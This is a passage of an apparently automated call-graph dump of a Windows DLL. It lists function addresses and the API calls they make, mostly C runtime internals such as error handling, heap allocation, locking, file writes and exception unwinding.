7935->7938 7937 18000a3c8 _errno 69 API calls 7936->7937 7942 180011ab5 7937->7942 7940 18000bb07 7938->7940 7941 18000a3c8 _errno 69 API calls 7938->7941 7939 180008f70 _invalid_parameter_noinfo 17 API calls 7939->7940 7940->7872 7940->7873 7941->7942 7942->7939 7947 180011b29 7943->7947 7944 180011b2e 7945 18000a3c8 _errno 69 API calls 7944->7945 7946 18000bb91 7944->7946 7948 180011b58 7945->7948 7946->7880 7946->7884 7947->7944 7947->7946 7950 180011b6c 7947->7950 7949 180008f70 _invalid_parameter_noinfo 17 API calls 7948->7949 7949->7946 7950->7946 7951 18000a3c8 _errno 69 API calls 7950->7951 7951->7948 7953 180011a27 7952->7953 7955 180011a1d 7952->7955 7954 18000a3c8 _errno 69 API calls 7953->7954 7960 180011a30 7954->7960 7955->7953 7958 180011a5e 7955->7958 7956 180008f70 _invalid_parameter_noinfo 17 API calls 7957 18000bbab 7956->7957 7957->7886 7957->7888 7958->7957 7959 18000a3c8 _errno 69 API calls 7958->7959 7959->7960 7960->7956 7962 180011c61 __crtIsPackagedApp 7961->7962 7963 180011c71 LoadLibraryExW 7962->7963 7964 180011d64 IsDebuggerPresent 7962->7964 7965 180011cb6 GetProcAddress 7963->7965 7966 180011c8e GetLastError 7963->7966 7967 180011d8b 7964->7967 7968 180011d6e 7964->7968 7972 180011ccf 7 API calls 7965->7972 7974 180011d81 7965->7974 7971 180011c9d LoadLibraryW 7966->7971 7966->7974 7969 180011d7c 7967->7969 7970 180011d90 DecodePointer 7967->7970 7968->7969 7973 180011d73 OutputDebugStringW 7968->7973 7969->7974 7978 180011dbc DecodePointer DecodePointer 7969->7978 7983 180011dda 7969->7983 7970->7974 7971->7965 7971->7974 7972->7964 7975 180011d44 GetProcAddress EncodePointer 7972->7975 7973->7969 7979 180006bc0 setSBUpLow 9 API calls 7974->7979 7975->7964 7976 180011e22 DecodePointer 7977 180011e56 DecodePointer 7976->7977 7981 180011e2d 7976->7981 7977->7974 7978->7983 7980 180011e87 7979->7980 7980->7897 7981->7977 7982 180011e43 DecodePointer 7981->7982 7982->7977 7984 180011e10 7982->7984 7983->7976 7983->7977 7983->7984 7984->7977 7986 180006bc9 7985->7986 7987 180006bd4 7986->7987 7988 180007f50 IsProcessorFeaturePresent 7986->7988 7987->7846 7989 180007f67 7988->7989 7994 18000cc38 RtlCaptureContext 7989->7994 7995 18000cc52 RtlLookupFunctionEntry 7994->7995 7996 180007f7a 7995->7996 7997 18000cc68 RtlVirtualUnwind 7995->7997 7998 180007f04 IsDebuggerPresent 7996->7998 7997->7995 7997->7996 7999 180007f23 __raise_securityfailure 7998->7999 8003 18000d10c SetUnhandledExceptionFilter UnhandledExceptionFilter 7999->8003 8005 18000b52f ExitProcess 8004->8005 8006 18000b518 GetProcAddress 8004->8006 8006->8005 8008 18000cce4 _freeptd TlsGetValue 8007->8008 8009 18000a189 8008->8009 8010 18000a191 8009->8010 8011 18000a1d8 SetLastError 8009->8011 8022 18000bd1c 8010->8022 8011->7905 8023 18000bd41 8022->8023 8025 18000a19e 8023->8025 8026 18000bd5f Sleep 8023->8026 8030 180011e98 8023->8030 8025->8011 8027 18000cd00 8025->8027 8026->8023 8026->8025 8028 18000cd13 TlsSetValue 8027->8028 8029 18000cd10 8027->8029 8029->8028 8031 180011ead 8030->8031 8035 180011eca 8030->8035 8032 180011ebb 8031->8032 8031->8035 8033 18000a3c8 _errno 68 API calls 8032->8033 8036 180011ec0 8033->8036 8034 180011ee2 HeapAlloc 8034->8035 8034->8036 8035->8034 8035->8036 8037 18000b3bc _callnewh DecodePointer 8035->8037 8036->8023 8037->8035 8039 18000f3ba 8038->8039 8040 18000f3cb EnterCriticalSection 8038->8040 8044 18000f468 8039->8044 8045 18000f485 8044->8045 8046 18000f49e 8044->8046 8048 18000b9fc _FF_MSGBANNER 67 API calls 8045->8048 8047 18000f3bf 8046->8047 8049 18000bd9c _malloc_crt 67 API calls 8046->8049 8047->8040 8065 18000b69c 8047->8065 8050 18000f48a 8048->8050 8052 18000f4c0 8049->8052 8051 18000ba70 _NMSG_WRITE 67 API calls 8050->8051 8053 18000f494 8051->8053 8054 18000f4d7 8052->8054 8055 18000f4c8 8052->8055 8056 18000b53c _mtinitlocknum 3 API calls 8053->8056 8058 18000f39c _lock 67 API calls 8054->8058 8057 18000a3c8 _errno 67 API calls 8055->8057 8056->8046 8057->8047 8059 18000f4e1 8058->8059 8060 18000f4ec InitializeCriticalSectionAndSpinCount 8059->8060 8061 18000f4fd 8059->8061 8063 18000f503 LeaveCriticalSection 8060->8063 8062 1800073d4 free 67 API calls 8061->8062 8064 18000f502 8062->8064 8063->8047 8064->8063 8066 18000b9fc _FF_MSGBANNER 69 API calls 8065->8066 8067 18000b6a9 8066->8067 8068 18000ba70 _NMSG_WRITE 69 API calls 8067->8068 8069 18000b6b0 8068->8069 8072 18000b864 8069->8072 8073 18000f39c _lock 61 API calls 8072->8073 8074 18000b892 8073->8074 8075 18000b980 doexit 8074->8075 8076 18000b8b9 DecodePointer 8074->8076 8077 18000b9b6 8075->8077 8089 18000f584 LeaveCriticalSection 8075->8089 8076->8075 8080 18000b8d7 DecodePointer 8076->8080 8084 18000b6c1 8077->8084 8090 18000f584 LeaveCriticalSection 8077->8090 8081 18000b8fc 8080->8081 8081->8075 8083 18000b90a EncodePointer 8081->8083 8087 18000b91e DecodePointer EncodePointer 8081->8087 8083->8081 8088 18000b937 DecodePointer DecodePointer 8087->8088 8088->8081 8530 180009fe1 8529->8530 8558 18000a100 8529->8558 8531 180009ffc 8530->8531 8532 1800073d4 free 69 API calls 8530->8532 8533 18000a00a 8531->8533 8534 1800073d4 free 69 API calls 8531->8534 8532->8531 8535 1800073d4 free 69 API calls 8533->8535 8536 18000a018 8533->8536 8534->8533 8535->8536 8537 18000a026 8536->8537 8539 1800073d4 free 69 API calls 8536->8539 8538 18000a034 8537->8538 8540 1800073d4 free 69 API calls 8537->8540 8541 18000a042 8538->8541 8542 1800073d4 free 69 API calls 8538->8542 8539->8537 8540->8538 8543 18000a053 8541->8543 8544 1800073d4 free 69 API calls 8541->8544 8542->8541 8545 18000a06b 8543->8545 8546 1800073d4 free 69 API calls 8543->8546 8544->8543 8547 18000f39c _lock 69 API calls 8545->8547 8546->8545 8550 18000a077 8547->8550 8548 18000a0a4 8561 18000f584 LeaveCriticalSection 8548->8561 8550->8548 8552 1800073d4 free 69 API calls 8550->8552 8552->8548 8558->7801 8563 180001404 MapViewOfFile 8562->8563 8564 1800013f7 GetLastError 8562->8564 8565 180001441 8563->8565 8566 18000142d CloseHandle 8563->8566 8564->7667 8565->7667 8566->7667 8568 180006bc0 setSBUpLow 9 API calls 8567->8568 8569 180003dd4 GetCurrentProcessId 8568->8569 8570 180001450 8569->8570 8571 180001499 sprintf 8570->8571 8589 18000a6ac 8571->8589 8573 180006bc0 setSBUpLow 9 API calls 8574 180001549 8573->8574 8574->7672 8574->7675 8575 1800014bc sprintf _UnwindNestedFrames 8575->8573 8580 180004a5d 8576->8580 8577 180004ad1 8585 180004ae9 _UnwindNestedFrames 8577->8585 8807 180005150 8577->8807 8578 180004b7d 8813 180006310 8578->8813 8580->8577 8580->8578 8582 180004a8a 8580->8582 8584 180004cda 8582->8584 8818 180006348 8582->8818 8586 180006348 _DllMainCRTStartup 71 API calls 8584->8586 8588 180004cf7 _DllMainCRTStartup 8584->8588 8585->7677 8587 180004da9 8586->8587 8588->7677 8592 18000a6cc 8589->8592 8593 18000a704 8592->8593 8594 18000a6fa 8592->8594 8595 18000a3c8 _errno 69 API calls 8593->8595 8596 18000a6c5 8593->8596 8594->8593 8597 18000a726 8594->8597 8618 18000a7de 8595->8618 8596->8575 8598 18000a778 8597->8598 8599 18000a72b 8597->8599 8601 18000a3c8 _errno 69 API calls 8598->8601 8602 18000a3c8 _errno 69 API calls 8599->8602 8600 180008f70 _invalid_parameter_noinfo 17 API calls 8600->8596 8603 18000a77d 8601->8603 8604 18000a730 8602->8604 8605 18000a5c4 _vsnprintf_helper 88 API calls 8603->8605 8620 18000a5c4 8604->8620 8610 18000a7a9 8605->8610 8608 18000a761 8611 18000a3c8 _errno 69 API calls 8608->8611 8609 18000a7cd 8609->8596 8615 18000a3c8 _errno 69 API calls 8609->8615 8610->8609 8612 18000a7b9 8610->8612 8613 18000a766 8611->8613 8614 18000a3c8 _errno 69 API calls 8612->8614 8613->8596 8617 18000a3c8 _errno 69 API calls 8613->8617 8616 18000a7be 8614->8616 8615->8618 8616->8596 8619 18000a3c8 _errno 69 API calls 8616->8619 8617->8596 8618->8600 8619->8596 8623 18000a600 sprintf 8620->8623 8621 18000a605 8622 18000a3c8 _errno 69 API calls 8621->8622 8624 18000a60a 8622->8624 8623->8621 8626 18000a624 8623->8626 8625 180008f70 _invalid_parameter_noinfo 17 API calls 8624->8625 8627 18000a615 8625->8627 8626->8627 8629 18000a438 8626->8629 8627->8608 8627->8609 8650 18000c824 8629->8650 8632 18000a465 8635 18000a3c8 _errno 69 API calls 8632->8635 8633 18000a47c 8634 18000a481 8633->8634 8644 18000a48e _flsbuf 8633->8644 8636 18000a3c8 _errno 69 API calls 8634->8636 8637 18000a46a 8635->8637 8636->8637 8637->8627 8638 18000a4f3 8639 18000a58b 8638->8639 8640 18000a500 8638->8640 8641 18000ff60 _flush 88 API calls 8639->8641 8642 18000a51c 8640->8642 8646 18000a535 8640->8646 8641->8637 8667 18000ff60 8642->8667 8644->8637 8644->8638 8647 18000a4e7 8644->8647 8656 18000ff00 8644->8656 8646->8637 8691 18001077c 8646->8691 8647->8638 8664 1800108f4 8647->8664 8651 18000a45a 8650->8651 8652 18000c82d 8650->8652 8651->8632 8651->8633 8653 18000a3c8 _errno 69 API calls 8652->8653 8654 18000c832 8653->8654 8655 180008f70 _invalid_parameter_noinfo 17 API calls 8654->8655 8655->8651 8657 18000ff16 8656->8657 8658 18000ff09 8656->8658 8660 18000ff0e 8657->8660 8661 18000a3c8 _errno 69 API calls 8657->8661 8659 18000a3c8 _errno 69 API calls 8658->8659 8659->8660 8660->8647 8662 18000ff4d 8661->8662 8663 180008f70 _invalid_parameter_noinfo 17 API calls 8662->8663 8663->8660 8665 18000bd9c _malloc_crt 69 API calls 8664->8665 8666 18001090d 8665->8666 8666->8638 8668 18000ff83 8667->8668 8669 18000ff9b 8667->8669 8715 18000a358 8668->8715 8670 180010012 8669->8670 8676 18000ffcd 8669->8676 8672 18000a358 _chsize_nolock 69 API calls 8670->8672 8675 180010017 8672->8675 8674 18000a3c8 _errno 69 API calls 8684 18000ff90 8674->8684 8677 18000a3c8 _errno 69 API calls 8675->8677 8718 180012460 8676->8718 8679 18001001f 8677->8679 8681 180008f70 _invalid_parameter_noinfo 17 API calls 8679->8681 8680 18000ffd4 8682 18000fff1 8680->8682 8683 18000ffe0 8680->8683 8681->8684 8686 18000a3c8 _errno 69 API calls 8682->8686 8726 180010040 8683->8726 8684->8637 8688 18000fff6 8686->8688 8687 18000ffed 8775 1800128c0 LeaveCriticalSection 8687->8775 8689 18000a358 _chsize_nolock 69 API calls 8688->8689 8689->8687 8692 1800107b7 8691->8692 8693 18001079f 8691->8693 8695 180010831 8692->8695 8700 1800107e9 8692->8700 8694 18000a358 _chsize_nolock 69 API calls 8693->8694 8696 1800107a4 8694->8696 8697 18000a358 _chsize_nolock 69 API calls 8695->8697 8698 18000a3c8 _errno 69 API calls 8696->8698 8699 180010836 8697->8699 8701 1800107ac 8698->8701 8702 18000a3c8 _errno 69 API calls 8699->8702 8703 180012460 __lock_fhandle 71 API calls 8700->8703 8701->8637 8704 18001083e 8702->8704 8705 1800107f0 8703->8705 8706 180008f70 _invalid_parameter_noinfo 17 API calls 8704->8706 8707 1800107fc 8705->8707 8708 18001080e 8705->8708 8706->8701 8710 180010860 _lseeki64_nolock 71 API calls 8707->8710 8709 18000a3c8 _errno 69 API calls 8708->8709 8711 180010813 8709->8711 8712 180010809 8710->8712 8713 18000a358 _chsize_nolock 69 API calls 8711->8713 8806 1800128c0 LeaveCriticalSection 8712->8806 8713->8712 8716 18000a16c _getptd_noexit 69 API calls 8715->8716 8717 18000a361 8716->8717 8717->8674 8719 180012498 8718->8719 8720 1800124ca EnterCriticalSection 8718->8720 8721 18000f39c _lock 69 API calls 8719->8721 8720->8680 8722 1800124a2 8721->8722 8723 1800124aa InitializeCriticalSectionAndSpinCount 8722->8723 8724 1800124c0 8722->8724 8723->8724 8776 18000f584 LeaveCriticalSection 8724->8776 8728 180010062 __crtGetStringTypeA_stat 8726->8728 8727 180010096 8730 18000a358 _chsize_nolock 69 API calls 8727->8730 8728->8727 8731 1800100f2 8728->8731 8763 18001008a 8728->8763 8729 180006bc0 setSBUpLow 9 API calls 8733 180010761 8729->8733 8734 18001009b 8730->8734 8732 180010107 8731->8732 8777 180010860 8731->8777 8736 18000ff00 _isatty 69 API calls 8732->8736 8733->8687 8737 18000a3c8 _errno 69 API calls 8734->8737 8738 18001010e 8736->8738 8739 1800100a2 8737->8739 8740 1800103d2 8738->8740 8745 18000a148 _getptd 69 API calls 8738->8745 8741 180008f70 _invalid_parameter_noinfo 17 API calls 8739->8741 8742 1800106b4 WriteFile 8740->8742 8743 1800103e9 8740->8743 8741->8763 8746 1800106da GetLastError 8742->8746 8751 18001039f 8742->8751 8744 1800104c3 8743->8744 8752 1800103fb 8743->8752 8756 1800104cd 8744->8756 8769 1800105a2 8744->8769 8748 180010132 GetConsoleMode 8745->8748 8746->8751 8747 18001070d 8750 18000a3c8 _errno 69 API calls 8747->8750 8747->8763 8748->8740 8749 180010167 8748->8749 8749->8740 8753 180010174 GetConsoleCP 8749->8753 8754 180010739 8750->8754 8751->8747 8755 1800106ff 8751->8755 8760 18000a3c8 _errno 69 API calls 8751->8760 8751->8763 8752->8747 8752->8751 8757 180010445 WriteFile 8752->8757 8753->8751 8773 18001018e _chsize_nolock 8753->8773 8759 18000a358 _chsize_nolock 69 API calls 8754->8759 8789 18000a378 8755->8789 8756->8747 8756->8751 8761 180010524 WriteFile 8756->8761 8757->8746 8757->8752 8758 1800105f2 WideCharToMultiByte 8758->8746 8758->8769 8759->8763 8764 1800106f4 8760->8764 8761->8746 8761->8756 8763->8729 8767 18000a358 _chsize_nolock 69 API calls 8764->8767 8766 180010643 WriteFile 8768 18001068d GetLastError 8766->8768 8766->8769 8767->8755 8768->8769 8769->8747 8769->8751 8769->8758 8769->8766 8770 180012c5c WriteConsoleW CreateFileW _putwch_nolock 8770->8773 8771 180010234 WideCharToMultiByte 8771->8751 8772 180010277 WriteFile 8771->8772 8772->8746 8772->8773 8773->8746 8773->8751 8773->8770 8773->8771 8774 1800102d0 WriteFile 8773->8774 8786 1800114a0 8773->8786 8774->8746 8774->8773 8794 18001279c 8777->8794 8780 180010896 SetFilePointerEx 8783 1800108ae GetLastError 8780->8783 8784 18001088a 8780->8784 8781 180010885 8782 18000a3c8 _errno 69 API calls 8781->8782 8782->8784 8785 18000a378 _dosmaperr 69 API calls 8783->8785 8784->8732 8785->8784 8787 180006be0 _LocaleUpdate::_LocaleUpdate 69 API calls 8786->8787 8788 1800114b4 8787->8788 8788->8773 8790 18000a16c _getptd_noexit 69 API calls 8789->8790 8791 18000a389 8790->8791 8792 18000a16c _getptd_noexit 69 API calls 8791->8792 8793 18000a3a2 free 8792->8793 8793->8747 8795 1800127a5 8794->8795 8797 1800127ba 8794->8797 8796 18000a358 _chsize_nolock 69 API calls 8795->8796 8798 1800127aa 8796->8798 8799 18000a358 _chsize_nolock 69 API calls 8797->8799 8803 18001087f 8797->8803 8801 18000a3c8 _errno 69 API calls 8798->8801 8800 1800127f4 8799->8800 8802 18000a3c8 _errno 69 API calls 8800->8802 8801->8803 8804 1800127fc 8802->8804 8803->8780 8803->8781 8805 180008f70 _invalid_parameter_noinfo 17 API calls 8804->8805 8805->8803 8809 18000518f 8807->8809 8808 1800051eb 8812 1800051f8 _UnwindNestedFrames 8808->8812 8831 1800062cc 8808->8831 8809->8808 8809->8812 8823 180007e98 8809->8823 8812->8585 8840 180008b4c 8813->8840 8816 1800083a8 _CxxThrowException 2 API calls 8817 180006345 8816->8817 8819 180008b4c std::exception::exception 69 API calls 8818->8819 8820 180006360 8819->8820 8821 1800083a8 _CxxThrowException 2 API calls 8820->8821 8822 18000637d 8821->8822 8827 180007ea3 8823->8827 8824 180007414 malloc 69 API calls 8824->8827 8825 180007ebc 8825->8808 8826 18000b3bc _callnewh DecodePointer 8826->8827 8827->8824 8827->8825 8827->8826 8828 180007ec2 std::_Xbad_alloc 8827->8828 8835 1800083a8 8828->8835 8830 180007f00 8832 1800062f1 std::_Xbad_alloc 8831->8832 8833 1800083a8 _CxxThrowException 2 API calls 8832->8833 8834 18000630e 8833->8834 8836 180008428 RtlPcToFileHeader 8835->8836 8837 180008418 8835->8837 8838 180008468 RaiseException 8836->8838 8839 18000844d 8836->8839 8837->8836 8838->8830 8839->8838 8843 180008c54 8840->8843 8844 180008c59 std::exception::_Copy_str 8843->8844 8847 180006328 8843->8847 8845 180007414 malloc 69 API calls 8844->8845 8846 180008c82 8845->8846 8846->8847 8848 18000f264 std::exception::_Copy_str 69 API calls 8846->8848 8847->8816 8848->8847 8918 180014a09 8921 18000eb24 8918->8921 8922 18000eb33 8921->8922 8923 18000eb45 8921->8923 8922->8923 8925 18000eb3b 8922->8925 8924 18000a148 _getptd 69 API calls 8923->8924 8926 18000eb4a 8924->8926 8928 18000a148 _getptd 69 API calls 8925->8928 8929 18000eb58 8925->8929 8927 18000a148 _getptd 69 API calls 8926->8927 8926->8929 8927->8929 8930 18000eb6a 8928->8930 8931 18000f1a0 FindHandler 73 API calls 8930->8931 8932 18000eb76 8931->8932 8933 18001460c 8934 180014644 __GSHandlerCheckCommon 8933->8934 8936 18001467a 8934->8936 8937 180008ac4 8934->8937 8938 18000a148 _getptd 69 API calls 8937->8938 8939 180008ae6 8938->8939 8940 18000a148 _getptd 69 API calls 8939->8940 8941 180008af6 8940->8941 8942 18000a148 _getptd 69 API calls 8941->8942 8943 180008b06 8942->8943 8946 18000ed0c 8943->8946 8947 18000a148 _getptd 69 API calls 8946->8947 8948 18000ed35 8947->8948 8949 18000ee32 8948->8949 8950 18000eda0 8948->8950 8963 180008b3b 8948->8963 8951 18000ee52 8949->8951 8949->8963 9004 1800088b0 8949->9004 8953 18000edfb 8950->8953 8956 18000edc2 8950->8956 8950->8963 8958 18000ee8c 8951->8958 8951->8963 9007 1800088c8 8951->9007 8955 18000ee1f 8953->8955 8957 18000ee04 8953->8957 8995 180008680 8955->8995 8968 18000f0f4 8956->8968 8964 18000ede5 8957->8964 8965 18000f180 _inconsistency 74 API calls 8957->8965 8958->8963 9010 18000de50 8958->9010 8963->8936 8978 18000eb78 8964->8978 8965->8964 8969 18000f116 8968->8969 8970 18000f11b 8968->8970 8971 18000f180 _inconsistency 74 API calls 8969->8971 8972 18000f180 _inconsistency 74 API calls 8970->8972 8973 18000edd4 8970->8973 8971->8970 8972->8973 8973->8964 8974 18000f180 DecodePointer 8973->8974 8975 18000f196 8974->8975 8976 18000f1a0 FindHandler 73 API calls 8975->8976 8977 18000f19f 8976->8977 8979 1800088b0 __InternalCxxFrameHandler 69 API calls 8978->8979 8980 18000ebab 8979->8980 9081 18000f050 8980->9081 8983 18000a148 _getptd 69 API calls 8993 18000ebc5 FindHandler __CxxCallCatchBlock 8983->8993 8984 18000ecc1 8985 18000a148 _getptd 69 API calls 8984->8985 8986 18000ecc6 8985->8986 8987 18000ecd4 8986->8987 8989 18000a148 _getptd 69 API calls 8986->8989 8990 18000ece9 FindHandler 8987->8990 8991 18000f180 _inconsistency 74 API calls 8987->8991 8988 18000f180 _inconsistency 74 API calls 8988->8993 8989->8987 8990->8963 8991->8990 8992 1800088b0 69 API calls __InternalCxxFrameHandler 8992->8993 8993->8984 8993->8988 8993->8992 9085 180008914 8993->9085 9088 180008488 8995->9088 8999 1800086b0 9000 18000a148 _getptd 69 API calls 8999->9000 9001 1800086e2 8999->9001 9000->8999 9002 18000eb78 __FrameUnwindToState 74 API calls 9001->9002 9003 180008701 9002->9003 9003->8963 9005 18000a148 _getptd 69 API calls 9004->9005 9006 1800088b9 9005->9006 9006->8951 9008 18000a148 _getptd 69 API calls 9007->9008 9009 1800088d1 9008->9009 9009->8958 9011 18000f0ec _GetRangeOfTrysToCheck 74 API calls 9010->9011 9012 18000de97 9011->9012 9013 180008488 _GetEstablisherFrame 75 API calls 9012->9013 9014 18000deab 9013->9014 9099 18000f078 9014->9099 9017 18000dee2 9019 18000f078 __GetUnwindTryBlock 75 API calls 9017->9019 9018 18000dec3 FindHandler 9102 18000f0b0 9018->9102 9020 18000dee0 9019->9020 9022 18000f180 _inconsistency 74 API calls 9020->9022 9025 18000defb 9020->9025 9022->9025 9023 18000e282 9024 18000e254 9023->9024 9027 18000e28e 9023->9027 9080 18000e2fd 9023->9080 9026 18000a148 _getptd 69 API calls 9024->9026 9025->9023 9029 18000e044 9025->9029 9032 18000a148 _getptd 69 API calls 9025->9032 9030 18000e259 9026->9030 9152 18000e304 9027->9152 9029->9023 9033 18000e06f 9029->9033 9034 18000e267 9030->9034 9038 18000f180 _inconsistency 74 API calls 9030->9038 9031 18000f1a0 FindHandler 73 API calls 9035 18000e303 9031->9035 9036 18000df31 9032->9036 9037 18000e1ba 9033->9037 9119 180008554 9033->9119 9034->8963 9036->9034 9040 18000a148 _getptd 69 API calls 9036->9040 9037->9024 9041 1800088b0 __InternalCxxFrameHandler 69 API calls 9037->9041 9044 18000e1e4 9037->9044 9038->9034 9042 18000df43 9040->9042 9041->9044 9043 18000a148 _getptd 69 API calls 9042->9043 9046 18000df4f 9043->9046 9044->9024 9045 18000e1fa 9044->9045 9047 1800088b0 __InternalCxxFrameHandler 69 API calls 9044->9047 9050 18000e56c IsInExceptionSpec 74 API calls 9045->9050 9105 180008930 9046->9105 9047->9045 9049 1800088b0 __InternalCxxFrameHandler 69 API calls 9057 18000e0a2 9049->9057 9051 18000e211 9050->9051 9051->9024 9053 180008488 _GetEstablisherFrame 75 API calls 9051->9053 9052 18000df67 FindHandler 9054 18000f180 _inconsistency 74 API calls 9052->9054 9062 18000df7d 9052->9062 9056 18000e227 9053->9056 9054->9062 9055 18000dfa3 9059 18000a148 _getptd 69 API calls 9055->9059 9147 18000894c 9056->9147 9057->9037 9057->9049 9060 1800088c8 69 API calls __InternalCxxFrameHandler 9057->9060 9124 18000ef30 9057->9124 9138 18000dd8c 9057->9138 9061 18000dfa8 9059->9061 9060->9057 9061->9029 9064 18000a148 _getptd 69 API calls 9061->9064 9062->9055 9063 18000f180 _inconsistency 74 API calls 9062->9063 9063->9055 9065 18000dfba 9064->9065 9066 18000a148 _getptd 69 API calls 9065->9066 9067 18000dfc6 9066->9067 9108 18000e56c 9067->9108 9072 18000e03f 9073 18000f1a0 FindHandler 73 API calls 9072->9073 9075 18000e2bf __DestructExceptionObject 9073->9075 9074 1800088b0 69 API calls __InternalCxxFrameHandler 9077 18000dfdc type_info::operator== 9074->9077 9076 180008b4c std::exception::exception 69 API calls 9075->9076 9078 18000e2e2 9076->9078 9077->9072 9077->9074 9077->9075 9079 1800083a8 _CxxThrowException 2 API calls 9078->9079 9079->9080 9080->9031 9082 18000ebbe 9081->9082 9083 18000f067 9081->9083 9082->8983 9084 18000f0f4 __InternalCxxFrameHandler 74 API calls 9083->9084 9084->9082 9086 18000a148 _getptd 69 API calls 9085->9086 9087 180008922 9086->9087 9087->8993 9089 18000f0ec _GetRangeOfTrysToCheck 74 API calls 9088->9089 9092 1800084b6 9089->9092 9090 180008523 9093 18000f0ec 9090->9093 9091 1800084df RtlLookupFunctionEntry 9091->9092 9092->9090 9092->9091 9094 18000f0f4 9093->9094 9095 18000f180 _inconsistency 74 API calls 9094->9095 9096 18000f11b 9094->9096 9095->9096 9097 18000f180 _inconsistency 74 API calls 9096->9097 9098 18000f12d 9096->9098 9097->9098 9098->8999 9100 180008488 _GetEstablisherFrame 75 API calls 9099->9100 9101 18000deb9 9100->9101 9101->9017 9101->9018 9103 180008488 _GetEstablisherFrame 75 API calls 9102->9103 9104 18000f0ca 9103->9104 9104->9020 9106 18000a148 _getptd 69 API calls 9105->9106 9107 18000893e 9106->9107 9107->9052 9109 18000e638 9108->9109 9116 18000e597 9108->9116 9111 18000f180 _inconsistency 74 API calls 9109->9111 9110 18000dfd8 9110->9029 9110->9077 9113 18000e63d 9111->9113 9112 1800088c8 69 API calls __InternalCxxFrameHandler 9112->9116 9114 18000f1a0 FindHandler 73 API calls 9113->9114 9115 18000e642 9114->9115 9116->9110 9116->9112 9117 1800088b0 __InternalCxxFrameHandler 69 API calls 9116->9117 9118 18000ef30 __TypeMatch 69 API calls 9116->9118 9117->9116 9118->9116 9120 18000f0ec _GetRangeOfTrysToCheck 74 API calls 9119->9120 9121 18000858c 9120->9121 9122 18000f180 _inconsistency 74 API calls 9121->9122 9123 180008598 9121->9123 9122->9123 9123->9057 9125 18000ef5b 9124->9125 9127 18000ef63 9124->9127 9126 1800088b0 __InternalCxxFrameHandler 69 API calls 9125->9126 9126->9127 9128 1800088b0 __InternalCxxFrameHandler 69 API calls 9127->9128 9129 18000ef82 9127->9129 9136 18000efde __TypeMatch 9127->9136 9128->9129 9130 18000ef9d 9129->9130 9131 1800088b0 __InternalCxxFrameHandler 69 API calls 9129->9131 9129->9136 9132 1800088c8 __InternalCxxFrameHandler 69 API calls 9130->9132 9131->9130 9133 18000efb1 9132->9133 9134 18000efca 9133->9134 9135 1800088b0 __InternalCxxFrameHandler 69 API calls 9133->9135 9133->9136 9137 1800088c8 __InternalCxxFrameHandler 69 API calls 9134->9137 9135->9134 9136->9057 9137->9136 9139 180008488 _GetEstablisherFrame 75 API calls 9138->9139 9140 18000ddc9 9139->9140 9141 18000ddef 9140->9141 9168 18000e668 9140->9168 9143 1800088b0 __InternalCxxFrameHandler 69 API calls 9141->9143 9144 18000ddf4 9143->9144 9145 18000894c _UnwindNestedFrames 10 API calls 9144->9145 9146 18000de34 9145->9146 9146->9057 9148 1800089ae _UnwindNestedFrames 9147->9148 9149 180008a1e RtlUnwindEx 9148->9149 9150 180006bc0 setSBUpLow 9 API calls 9149->9150 9151 180008aa4 9150->9151 9151->9024 9153 18000e551 9152->9153 9154 18000e335 9152->9154 9153->9024 9155 18000a148 _getptd 69 API calls 9154->9155 9156 18000e33a 9155->9156 9157 18000e34c EncodePointer 9156->9157 9164 18000e3a3 9156->9164 9158 18000a148 _getptd 69 API calls 9157->9158 9162 18000e35c 9158->9162 9159 18000e3bf 9161 180008554 _GetRangeOfTrysToCheck 74 API calls 9159->9161 9160 18000f180 _inconsistency 74 API calls 9160->9159 9166 18000e3f4 9161->9166 9162->9164 9189 1800087b8 9162->9189 9164->9153 9164->9159 9164->9160 9165 1800088b0 69 API calls __InternalCxxFrameHandler 9165->9166 9166->9153 9166->9165 9167 18000dd8c CatchIt 76 API calls 9166->9167 9167->9166 9169 18000e68c 9168->9169 9177 18000e720 9169->9177 9171 18000e69d 9172 18000e6d8 9171->9172 9174 18000e6a1 9171->9174 9173 1800088c8 __InternalCxxFrameHandler 69 API calls 9172->9173 9175 18000e6b1 __AdjustPointer 9172->9175 9173->9175 9174->9175 9176 1800088c8 __InternalCxxFrameHandler 69 API calls 9174->9176 9175->9141 9176->9175 9178 18000e750 9177->9178 9180 18000e758 9177->9180 9179 1800088b0 __InternalCxxFrameHandler 69 API calls 9178->9179 9179->9180 9181 1800088b0 __InternalCxxFrameHandler 69 API calls 9180->9181 9182 18000e774 9180->9182 9187 18000e7df __AdjustPointer _UnwindNestedFrames 9180->9187 9181->9182 9183 1800088c8 __InternalCxxFrameHandler 69 API calls 9182->9183 9185 18000e7ba FindHandler 9182->9185 9186 18000e852 FindHandler 9182->9186 9182->9187 9183->9186 9184 18000f180 _inconsistency 74 API calls 9184->9187 9185->9184 9185->9187 9186->9185 9188 1800088c8 __InternalCxxFrameHandler 69 API calls 9186->9188 9187->9171 9188->9185 9190 18000a148 _getptd 69 API calls 9189->9190 9191 1800087e4 9190->9191 9191->9164 9192 18001470c 9193 180014740 9192->9193 9194 18001472e 9192->9194 9195 180008024 _CRT_INIT 148 API calls 9194->9195 9195->9193 9543 180001190 9544 1800011ab 9543->9544 9544->9544 9545 180004120 71 API calls 9544->9545 9546 1800011e4 9545->9546 9196 180014d13 9197 180014d2c 9196->9197 9198 1800083a8 _CxxThrowException 2 API calls 9197->9198 9199 180014d50 9198->9199 9200 180014d9d 9199->9200 9201 180014d93 9199->9201 9202 180007e98 _DllMainCRTStartup 71 API calls 9199->9202 9201->9200 9203 1800062cc std::_Xbad_alloc 2 API calls 9201->9203 9202->9201 9203->9200 9204 18000c114 9211 18000cacc 9204->9211 9212 18000cad8 9211->9212 9213 18000f39c _lock 69 API calls 9212->9213 9219 18000cb00 9213->9219 9214 18000cb91 9238 18000f584 LeaveCriticalSection 9214->9238 9219->9214 9220 18000ca04 92 API calls _fflush_nolock 9219->9220 9230 18000c1b4 9219->9230 9235 18000c238 9219->9235 9220->9219 9231 18000c1c2 9230->9231 9232 18000c1d5 EnterCriticalSection 9230->9232 9233 18000f39c _lock 69 API calls 9231->9233 9234 18000c1ca 9233->9234 9234->9219 9236 18000c24a LeaveCriticalSection 9235->9236 9237 18000c23d 9235->9237 9237->9236 9547 18000ec9a 9557 18000ebcb FindHandler __CxxCallCatchBlock 9547->9557 9548 18000ecc1 9549 18000a148 _getptd 69 API calls 9548->9549 9550 18000ecc6 9549->9550 9551 18000ecd4 9550->9551 9553 18000a148 _getptd 69 API calls 9550->9553 9554 18000ece9 FindHandler 9551->9554 9556 18000f180 _inconsistency 74 API calls 9551->9556 9552 18000f180 _inconsistency 74 API calls 